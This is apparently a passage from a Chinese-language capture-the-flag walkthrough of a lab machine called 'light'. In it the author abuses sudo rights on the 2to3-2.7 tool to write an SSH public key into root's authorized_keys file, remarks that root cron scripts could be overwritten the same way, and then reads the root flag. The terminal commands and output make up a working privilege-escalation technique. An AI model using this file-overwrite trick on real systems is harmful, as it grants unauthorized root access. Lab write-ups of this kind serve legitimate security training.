RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys.
Traceback (most recent call last):
File "/usr/bin/2to3-2.7", line 5, in <module>
sys.exit(main("lib2to3.fixes"))
File "/usr/lib/python2.7/lib2to3/main.py", line 260, in main
options.processes)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 706, in refactor
items, write, doctests_only)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 301, in refactor
self.refactor_file(dir_or_file, write, doctests_only)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 747, in refactor_file
*args, **kwargs)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 358, in refactor_file
write=write, encoding=encoding)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 524, in processed_file
self.write_file(new_text, filename, old_text, encoding)
File "/usr/lib/python2.7/lib2to3/main.py", line 101, in write_file
write(new_text, filename, old_text, encoding)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 536, in write_file
f = _open_with_encoding(filename, "w", encoding=encoding)
File "/usr/lib/python2.7/codecs.py", line 898, in open
file = __builtin__.open(filename, mode, buffering)
IOError: [Errno 21] Is a directory: '/root/.ssh/authorized_keys'
啊啊啊啊,应该仔细看的,重置靶机。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
lover@light:/tmp$ nano authorized_keys
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/
lib2to3.main: Output in '/root/.ssh/' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys.
RefactoringTool: Files that were modified:
RefactoringTool: authorized_keys
同理可以覆写高权限定时任务(运行 pspy64 可以看到有一个 root 运行的 python 定时任务),覆写第三方库的 main 函数等等都行。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
root@light:~# ls -la
total 40
drwx------ 5 root root 4096 Jun 27 03:01 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rwxr-xr-x 1 root root 1921 Nov 13 2020 flag.sh
drwxr-xr-x 3 root root 4096 Nov 13 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 12 Nov 13 2020 root.txt
drwxr-xr-x 2 root root 4096 Nov 13 2020 script
-rw-r--r-- 1 root root 66 Nov 13 2020 .selected_editor
drwxr-xr-x 2 root root 4096 Jun 27 03:01 .ssh
root@light:~# cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
root@light:~# cat root.txt
ilovepython
root@light:~# cd script/
root@light:~/script# ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 13 2020 .
drwx------ 5 root root 4096 Jun 27 03:01 ..
-rw-r--r-- 1 root root 21 Nov 13 2020 light.py
root@light:~/script# cat light.py
print "NOT FINISHED"
本文由作者按照 CC BY 4.0 进行授权